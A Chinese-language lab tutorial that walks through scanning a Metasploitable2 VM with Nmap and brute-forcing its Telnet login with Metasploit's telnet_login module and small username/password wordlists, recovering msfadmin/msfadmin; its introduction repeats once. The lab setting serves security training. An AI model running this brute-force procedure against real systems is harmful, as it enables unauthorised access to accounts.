介绍
在本实验中,我们将学习如何利用 Telnet 服务漏洞并执行渗透攻击。场景涉及使用 Kali Linux 机器作为攻击机,Metasploitable2 虚拟机作为目标机。目标是扫描目标机的漏洞,识别 Telnet 服务漏洞,并使用 Metasploit Framework 对其进行利用。
在本实验中,我们将学习如何利用 Telnet 服务漏洞并执行渗透攻击。场景涉及使用 Kali Linux 机器作为攻击机,Metasploitable2 虚拟机作为目标机。目标是扫描目标机的漏洞,识别 Telnet 服务漏洞,并使用 Metasploit Framework 对其进行利用。
在这一步中,我们将启动实验环境,其中包括 Kali Linux 容器和 Metasploitable2 虚拟机。
sudo virsh start Metasploitable2
等待目标机器启动,可能需要1-3分钟。
ping 192.168.122.102
按下 Ctrl+C
停止 ping。
docker run -ti --network host b5b709a49cd5 bash
ping 192.168.122.102
按下 Ctrl+C
停止 ping。
现在攻击机和目标机都已启动,你可以开始进行渗透测试。
注意:如果你意外退出了当前的 bash,Kali 容器将自动停止。你可以在主机上再次执行 docker run -ti --network host b5b709a49cd5 bash
来启动一个新的 Kali 容器并进入 bash 以继续实验。
在这一步中,我们将使用 Nmap 扫描目标机以查找开放的端口和服务。
首先,启动 PostgreSQL 数据库,因为 Metasploit 需要它来存储数据:
service postgresql start
msfdb init
cd ~
msfconsole
在 Metasploit 控制台中,对目标机运行 Nmap 扫描:
nmap -sV -T4 192.168.122.102
-sV
选项扫描开放的端口并显示详细的端口信息,而 -T4
设置扫描时间策略(0-5,数值越高速度越快但噪音更大)。
在这一步中,我们将分析 Nmap 扫描结果,以识别存在漏洞的 Telnet 服务。
Nmap 扫描输出显示 Telnet 服务正在端口 23 上运行,并显示横幅信息 "Linux telnetd"。让我们搜索对应的 Metasploit 模块:
search scanner/telnet
使用 auxiliary/scanner/telnet/telnet_login
模块:
use auxiliary/scanner/telnet/telnet_login
显示模块选项:
show options
必需的选项是 RHOSTS
,它用于指定目标主机。
按下 Ctrl+D 退出 Metasploit 控制台,然后开始检查
在这一步中,我们将为登录暴力破解攻击准备用户名和密码字典文件。
打开一个新的终端并连接到 Kali 容器:
docker run -ti --network host b5b709a49cd5 bash
在 /
目录下创建一个文件 username.txt
,内容如下:
123456
admin
msfadmin
root
kali
在 /
目录下创建另一个文件 password.txt
,内容如下:
abc123
1234
123456
root
msfadmin
admin
toor
这些文件将用作暴力破解攻击的用户名和密码字典。
在这一步中,我们将为目标主机、用户名字典和密码字典配置 Metasploit 模块。
首先,如果你不在 Metasploit 控制台中,你需要启动 Metasploit 控制台:
cd ~
msfconsole
使用 auxiliary/scanner/telnet/telnet_login
模块:
use auxiliary/scanner/telnet/telnet_login
设置目标主机:
set RHOSTS 192.168.122.102
设置用户名字典文件:
set USER_FILE /username.txt
设置密码字典文件:
set PASS_FILE /password.txt
最后,运行漏洞利用:
exploit
Metasploit 将开始尝试从提供的字典中使用不同的用户名和密码组合。如果找到有效的凭据,它将以绿色显示。
在这种情况下,有效的凭据是 msfadmin/msfadmin
。
按下 Ctrl+D 退出 Metasploit 控制台,然后开始检查
在本实验中,我们学习了如何使用 Metasploit Framework 利用 Telnet 服务漏洞。我们首先使用 Kali Linux 攻击机和 Metasploitable2 目标机搭建了实验环境。接着,我们使用 Nmap 进行漏洞扫描,识别出开放的 Telnet 服务。然后,我们准备了用户名和密码字典,并为目标主机和字典文件配置了 Metasploit 模块。最后,我们执行了漏洞利用,并成功暴力破解了 Telnet 登录凭据。
本实验提供了渗透测试、漏洞扫描以及利用 Metasploit Framework 进行漏洞利用的实践经验。它强调了安全密码实践的重要性,以及使用弱密码或易猜测凭据的潜在风险。